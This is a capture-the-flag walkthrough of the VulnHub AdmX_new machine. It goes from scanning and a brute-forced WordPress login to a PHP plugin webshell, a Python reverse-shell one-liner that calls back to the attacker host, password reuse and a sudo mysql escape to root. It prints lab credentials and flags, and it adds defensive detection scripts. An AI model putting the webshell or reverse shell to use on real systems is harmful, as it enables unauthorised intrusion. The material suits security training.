VulnHub-AdmX_new

Target VM: https://download.vulnhub.com/admx/AdmX_new.7z

Goal: obtain 2 flags and root privileges

I. Host discovery

Scanning the 192.168.11.0/24 subnet with nmap (arp-scan is faster than nmap for this) shows that 192.168.11.135 is the target's IP.

nmap -sn 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.11.0/24 |grep 192.168.11 |awk '{print($5)}'
192.168.11.1
192.168.11.135
192.168.11.254
192.168.11.131

II. Port scan

A full port scan shows that the target has only port 80 open.

nmap -p- 192.168.11.135

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.11.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 08:12 CST
Nmap scan report for 192.168.11.135
Host is up (0.00069s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:81:91:C6 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 118.46 seconds

III. Service version scan

A targeted scan of port 80 shows that it is an HTTP service running on an Apache server, and that the target OS is Ubuntu.

nmap -p80 -sV 192.168.11.135

┌──(root㉿kali)-[~]
└─# nmap -p80 -sV 192.168.11.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 08:17 CST
Nmap scan report for 192.168.11.135
Host is up (0.00041s latency).

PORT   STATE SERVICE VERSION
80/tcp open http   Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:81:91:C6 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds

IV. Inspect the service

Browsing to http://192.168.11.135:80/ reveals nothing.

V. Directory scan

1. feroxbuster scan

Use feroxbuster to brute-force the paths of the target's HTTP site

feroxbuster --url http://192.168.11.135/

  • -w # specify a wordlist (the default wordlist is /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt)

┌──(root㉿kali)-[~]
└─# feroxbuster --url http://192.168.11.135/

___ ___ __   __     __     __         __   ___
|__ |__ |__) |__) | / `   / \ \_/ | | \ |__
|   |___ | \ | \ | \__,   \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.3
───────────────────────────┬──────────────────────
🎯 Target Url           │ http://192.168.11.135/
🚀 Threads               │ 50
📖 Wordlist             │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes         │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs)       │ 7
🦡 User-Agent           │ feroxbuster/2.7.3
💉 Config File           │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods         │ [GET]
🔃 Recursion Depth       │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────

2. Abnormal WordPress access

2.1 Capture and analyse with BurpSuite

When visiting http://192.168.11.135/wordpress/, the page tries to load JS files from 192.168.159.145 to style itself, but both IPs actually point to the same WordPress CMS.

2.2 Match and Replace

Because the server returns 192.168.159.145 to the client in its responses when 192.168.11.135 is visited, replacing 192.168.159.145 with 192.168.11.135 in the responses is enough to load the page properly.

2.3 Visiting the discovered directories

2.3.1 WP sample page

http://192.168.11.135/wordpress/

2.3.2 WP admin login page

http://192.168.11.135/wordpress/wp-admin/ => http://192.168.11.135/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.135%2Fwordpress%2Fwp-admin%2F&reauth=1

VI. Password brute force

Testing the login page shows that the username is admin

Brute forcing yields the password adam14

Wordlist download: SuperWordlist

Wordlist used: MidPwds.txt

Log in to the admin panel

  • Username: admin

  • Password: adam14
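A defender-side counterpart to this step, added here as an example and not part of the original write-up: a Python script that flags clients making many POSTs to wp-login.php within a short window, run over constructed Apache combined-log lines (the IPs, window and threshold are assumptions).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined-log line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def _line(ip, when, method, path, status):
    """Build one constructed combined-log line (sample data, not a real log)."""
    return (f'{ip} - - [{when.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
            f'{status} 4321 "-" "Mozilla/5.0"')

def build_sample_log():
    """Constructed sample: one client hammering wp-login.php, one normal admin."""
    t0 = datetime.strptime("13/Apr/2023:08:30:00 +0800", TS_FMT)
    lines = [_line("192.168.11.131", t0 + timedelta(milliseconds=200 * i),
                   "POST", "/wordpress/wp-login.php", 200) for i in range(40)]
    # A real admin: one failed attempt, then a successful login a minute later.
    lines += [_line("192.168.11.1", t0 + timedelta(seconds=s),
                    "POST", "/wordpress/wp-login.php", code)
              for s, code in ((5, 200), (65, 302))]
    lines.append(_line("192.168.11.1", t0 + timedelta(seconds=70),
                       "GET", "/wordpress/wp-admin/", 200))
    return "\n".join(lines)

def find_login_bruteforce(log_text, window_s=60, threshold=20):
    """Return {ip: peak number of POSTs to wp-login.php inside any window_s-second
    window} for clients that reach threshold. One sliding deque per IP keeps it O(n)."""
    recent = defaultdict(deque)
    peak = {}
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m or m["method"] != "POST" or not m["path"].endswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_s):  # drop entries outside the window
            q.popleft()
        if len(q) >= threshold:
            peak[m["ip"]] = max(peak.get(m["ip"], 0), len(q))
    return peak

if __name__ == "__main__":
    print(find_login_bruteforce(build_sample_log()))  # {'192.168.11.131': 40}
```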

VII. Exploiting the WordPress admin panel

  • Media allows file uploads

  • Appearance allows uploading a one-line webshell

  • Plugins also allows uploading a one-line webshell when uploading a plugin

1. Inserting a one-line webshell via Plugins

1.1 Create the webshell plugin shell.php

<?php
/**
* Plugin Name: Shell
* Plugin URI: https://x.github.io
* Description: WP Webshell for Pentest
* Version: 1.0
* Author: kalpa
* Author URI: https://x.github.io
* License: https://x.github.io
*/

if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>

1.2 Compress it into a zip

zip shell.zip shell.php

┌──(root㉿kali)-[~/admx]
└─# zip shell.zip shell.php
adding: shell.php (deflated 33%)

┌──(root㉿kali)-[~/admx]
└─# ls
shell.php shell.zip

1.3 Upload shell.zip

Upload successful

1.4 Verify shell.zip

Run a test command on the target (which python3)

http://192.168.11.135/wordpress/wp-content/plugins/shell.php?cmd=which%20python3
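What this plugin looks like from the defender's side, as an added example that is not part of the write-up: a scanner that walks a WordPress plugins directory and flags PHP that feeds request input straight into a command-execution or eval call. The sample plugin files and the temporary directory are constructed for the demo.

```python
import os
import re
import tempfile

# PHP functions that run OS commands, and the superglobals that carry request input.
EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)"
REQUEST_VARS = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# exec-style call whose argument list (up to the statement end) mentions a superglobal
DIRECT_EXEC = re.compile(EXEC_FUNCS + r"\s*\([^;]*" + REQUEST_VARS, re.I)
EVAL_INPUT = re.compile(r"\beval\s*\([^;]*" + REQUEST_VARS, re.I)

def scan_file(path):
    """Return [(line_number, stripped_line)] for suspicious lines in one PHP file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            if DIRECT_EXEC.search(line) or EVAL_INPUT.search(line):
                findings.append((n, line.strip()))
    return findings

def scan_plugins(plugins_dir):
    """Walk plugins_dir; return {relative path (with /): findings} for files with hits."""
    hits = {}
    for root, _, files in os.walk(plugins_dir):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(root, name)
                found = scan_file(full)
                if found:
                    hits[os.path.relpath(full, plugins_dir).replace(os.sep, "/")] = found
    return hits

# Constructed sample plugins: the page's style of shell, a benign plugin, an eval shell.
SAMPLES = {
    "shell/shell.php": "<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}\n?>\n",
    "hello/hello.php": "<?php\necho esc_html(get_option('blogname'));\n",
    "sneaky/s.php": "<?php @eval( $_POST['x'] );\n",
}

def demo():
    """Write the samples into a temporary plugins directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for rel, body in SAMPLES.items():
            os.makedirs(os.path.join(d, os.path.dirname(rel)), exist_ok=True)
            with open(os.path.join(d, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_plugins(d)

if __name__ == "__main__":
    for path, found in demo().items():
        print(path, found)  # shell/shell.php [(4, "system($_GET['cmd']);")] ...
```

Pattern matching of this kind is a first pass only; obfuscated shells (base64-wrapped code, variable function names) need a file-integrity baseline of the plugins directory as well.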

2. Netcat reverse shell

2.1 Start the listener

nc -lvnp 8989

2.2 Reverse shell via Python3

Note: the other reverse-shell methods did not work; only Python3 did

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.131",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

2.3 Obtain the shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.135] 44338
www-data@wp:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wp:/var/www/html/wordpress$

2.4 Upgrade to a full TTY

  1. CTRL+Z

  2. stty raw -echo

  3. fg

  4. ls

  5. export SHELL=/bin/bash

  6. export TERM=screen

  7. stty rows 33 columns 145

  8. reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.135] 44338
www-data@wp:/var/www/html/wordpress$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@wp:/var/www/html/wordpress$ ^Z
[1]+ 已停止               nc -lvnp 8989

┌──(root㉿kali)-[~]
└─# stty raw -echo

┌──(root㉿kali)-[~]
└─#
nc -lvnp 8989
            ls
index.php       wp-blog-header.php   wp-cron.php       wp-mail.php
license.txt     wp-comments-post.php wp-includes       wp-settings.php
readme.html     wp-config-sample.php wp-links-opml.php wp-signup.php
wp-activate.php wp-config.php         wp-load.php       wp-trackback.php
wp-admin         wp-content           wp-login.php       xmlrpc.php
www-data@wp:/var/www/html/wordpress$ export SHELL=/bin/bash
www-data@wp:/var/www/html/wordpress$ export TERM=screen
www-data@wp:/var/www/html/wordpress$ stty rows 33 columns 145
www-data@wp:/var/www/html/wordpress$ reset
www-data@wp:/var/www/html/wordpress$

Note: you can also write a one-line webshell (and connect with AntSword) or plant further backdoors, so that in a real engagement access is not lost if one of them is detected and removed.

2.5 Internal information gathering

During information gathering a file named local.txt was found, but only the wpadmin user has permission to read it.

www-data@wp:/var/www/html/wordpress$ ls -al
total 224
drwxr-x--- 5 www-data www-data 4096 May 8 2021 .
drwxr-xr-x 4 root root 4096 May 8 2021 ..
-rw-r----- 1 www-data www-data 543 May 11 2021 .htaccess
-rw-r----- 1 www-data www-data 405 Feb 6 2020 index.php
-rw-r----- 1 www-data www-data 19915 Jan 1 2021 license.txt
-rw-r----- 1 www-data www-data 7345 Dec 29 2020 readme.html
-rw-r----- 1 www-data www-data 7165 Jan 21 2021 wp-activate.php
drwxr-x--- 9 www-data www-data 4096 Apr 15 2021 wp-admin
-rw-r----- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rw-r----- 1 www-data www-data 2328 Feb 17 2021 wp-comments-post.php
-rw-r----- 1 www-data www-data 2913 Feb 6 2020 wp-config-sample.php
-rw-r----- 1 www-data www-data 1160 May 8 2021 wp-config.php
drwxr-x--- 6 www-data www-data 4096 Apr 14 01:05 wp-content
-rw-r----- 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-x--- 25 www-data www-data 12288 Apr 15 2021 wp-includes
-rw-r----- 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rw-r----- 1 www-data www-data 3313 Jan 10 2021 wp-load.php
-rw-r----- 1 www-data www-data 44994 Apr 4 2021 wp-login.php
-rw-r----- 1 www-data www-data 8509 Apr 14 2020 wp-mail.php
-rw-r----- 1 www-data www-data 21125 Feb 2 2021 wp-settings.php
-rw-r----- 1 www-data www-data 31328 Jan 27 2021 wp-signup.php
-rw-r----- 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rw-r----- 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
www-data@wp:/home/wpadmin$ cd /root/
bash: cd: /root/: Permission denied
www-data@wp:/var/www/html/wordpress$ cd /home/
www-data@wp:/home$ ls -al
total 12
drwxr-xr-x 3 root root 4096 May 8 2021 .
drwxr-xr-x 20 root root 4096 Feb 16 21:35 ..
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 wpadmin
www-data@wp:/home$ cd wpadmin/
www-data@wp:/home/wpadmin$ ls -al
total 28
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 .
drwxr-xr-x 3 root root 4096 May 8 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wpadmin wpadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 wpadmin wpadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 wpadmin wpadmin 4096 May 11 2021 .cache
-rw-r--r-- 1 wpadmin wpadmin 807 Feb 25 2020 .profile
-r-------- 1 wpadmin wpadmin 33 May 8 2021 local.txt
www-data@wp:/home/wpadmin$ cat local.txt
cat: local.txt: Permission denied

VIII. Password reuse

1. Obtain a shell as wpadmin

During information gathering the WordPress database configuration file wp-config.php was also found; it contains a username and password.

www-data@wp:/var/www/html/wordpress$ cat wp-config.php 
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );

define( 'AUTH_KEY', '-=<%h-&zmo1#bWHqHEib?bJt!)mOL7E+j{x7x;Hsc}t?xm?=kRfunrRmTUP;#8OS' );
define( 'SECURE_AUTH_KEY', 'A5#uw+^B_f:K]WNq@aoXLpD@bmMD/hev^UAf,^lTCX3@a1&7A(qLFS_{I=pYw(ET' );
define( 'LOGGED_IN_KEY', '~*TFb3]y1^|G9j%?Z@F[63A+AAT<mndFo-H{q0P#Nz/qYN3da@UXyY6YP6`7QNmy' );
define( 'NONCE_KEY', 'bP88<WoD?9;eN0yM9A{+])!$(k[zp{:-.ZS6Fk*snlJN&GXU6Zy_)wEbqk>-? nn' );
define( 'AUTH_SALT', 'SX%VenTL%k&f%i8tFAhtf#svIc|nt.&t~R%zp=:n:Q%e0Ux?k,-j?ZAjZZ%;w1ih' );
define( 'SECURE_AUTH_SALT', '-e Z<w<q8F~Tm7IeNu2nSa^or=*B?bV*yRBa+4; My}cIJ]?L%j14RWghI,D^M^5' );
define( 'LOGGED_IN_SALT', '}Z}fYC%Mv;;ON/h~$c2c,u[FZ>`YaiscN6UY&HCcXUVl{miUbX4a/ LdJ^AoL/Z{' );
define( 'NONCE_SALT', 'BQPaC,#p}PEcU^eC*Hwss>9~UCEKhv]tox~PN)?B.kSn%tC)V~pZ6RpOBR>80o5+' );

$table_prefix = 'wp_';

define( 'WP_DEBUG', false );

if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';www-data@wp:/var/www/html/wordpress$

The site administrator may well reuse passwords, so try the passwords already obtained to log in as wpadmin

su wpadmin

Logging in with the previously obtained admin-panel password (adam14) succeeds; now view the local.txt file in /home/wpadmin/

www-data@wp:/var/www$ su wpadmin
Password:
wpadmin@wp:/var/www$ cd ~
wpadmin@wp:~$ ls -al
total 28
drwxr-xr-x 3 wpadmin wpadmin 4096 May 11 2021 .
drwxr-xr-x 3 root root 4096 May 8 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 wpadmin wpadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 wpadmin wpadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 wpadmin wpadmin 4096 May 11 2021 .cache
-r-------- 1 wpadmin wpadmin 33 May 8 2021 local.txt
-rw-r--r-- 1 wpadmin wpadmin 807 Feb 25 2020 .profile
wpadmin@wp:~$ cat local.txt
153495edec1b606c24947b1335998bd9
wpadmin@wp:~$

Flag obtained

153495edec1b606c24947b1335998bd9

2. Privilege escalation via MySQL

Testing shows that wpadmin does not have root privileges

wpadmin@wp:~$ sudo ls -al /root/
[sudo] password for wpadmin:
Sorry, user wpadmin is not allowed to execute '/usr/bin/ls -al /root/' as root on wp.
wpadmin@wp:~$ sudo -l
Matching Defaults entries for wpadmin on wp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wpadmin may run the following commands on wp:
(root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p

Given (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p, consider escalating privileges through MySQL

sudo /usr/bin/mysql -u root -D wordpress -p

\! /bin/bash

wpadmin@wp:~$ sudo /usr/bin/mysql -u root -D wordpress -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 220
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [wordpress]> system id
uid=0(root) gid=0(root) groups=0(root)
MariaDB [wordpress]> \! /bin/bash
root@wp:/home/wpadmin# id
uid=0(root) gid=0(root) groups=0(root)
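An added example, not part of the write-up, for auditing this kind of sudo rule: a Python parser for `sudo -l` output that flags rules running as root whose binary can spawn a shell from its own prompt (as mysql does with \!). The sample output is constructed from the page's rule plus two extra rules for contrast, and the list of escape-capable binaries is an assumed, partial one.

```python
import re

# Binaries whose own interactive prompt can spawn a shell (\! in mysql, :!sh in vim,
# !sh in less/more, etc.). Assumed, partial list; extend it for your environment.
SHELL_ESCAPE_BINS = {"mysql", "mariadb", "vim", "vi", "less", "more", "man", "find",
                     "awk", "python", "python3", "perl", "gdb", "ftp"}

# One rule line from `sudo -l`: (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$")

# Constructed sample modelled on the page's output, with two extra rules for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for wpadmin on wp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/bin

User wpadmin may run the following commands on wp:
    (root) NOPASSWD: /usr/bin/mysql -u root -D wordpress -p
    (root) /usr/bin/systemctl restart apache2
    (www-data) NOPASSWD: /usr/bin/php /var/www/maint.php
"""

def parse_rules(text):
    """Return the rule lines that follow 'User ... may run' as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append({"runas": m["runas"].strip(), "nopasswd": "NOPASSWD:" in m["tags"],
                          "cmd": m["cmd"], "args": m["args"].strip()})
    return rules

def risky_rules(text):
    """Rules that run as root and whose binary can break out to a shell."""
    out = []
    for r in parse_rules(text):
        name = r["cmd"].rsplit("/", 1)[-1]
        if r["runas"] in ("root", "ALL") and name in SHELL_ESCAPE_BINS:
            reason = "interactive shell escape gives a root shell"
            if r["nopasswd"]:
                reason += ", no password required"
            out.append((" ".join(filter(None, (r["cmd"], r["args"]))), reason))
    return out

if __name__ == "__main__":
    for cmd, why in risky_rules(SAMPLE_SUDO_L):
        print(f"RISK: {cmd} -> {why}")
```

The fix for a rule like the page's is to replace it with a non-interactive wrapper script that runs the one query the user needs, rather than handing out the full mysql client as root.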

Root privileges are now obtained; next, locate and read the second flag

root@wp:/home/wpadmin# cd /root/
root@wp:~# la -al
total 36
drwx------ 5 root root 4096 May 8 2021 .
drwxr-xr-x 20 root root 4096 Feb 16 21:35 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 May 8 2021 .cache
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r-------- 1 root root 33 May 8 2021 proof.txt
drwxr-xr-x 3 root root 4096 May 8 2021 snap
drwx------ 2 root root 4096 May 8 2021 .ssh
-rw-r--r-- 1 root root 227 May 8 2021 .wget-hsts
root@wp:~# cat proof.txt
7efd721c8bfff2937c66235f2d0dbac1
root@wp:~#

The box is done, game over OVO

Posted 2023-04-14 10:54 by HKalpa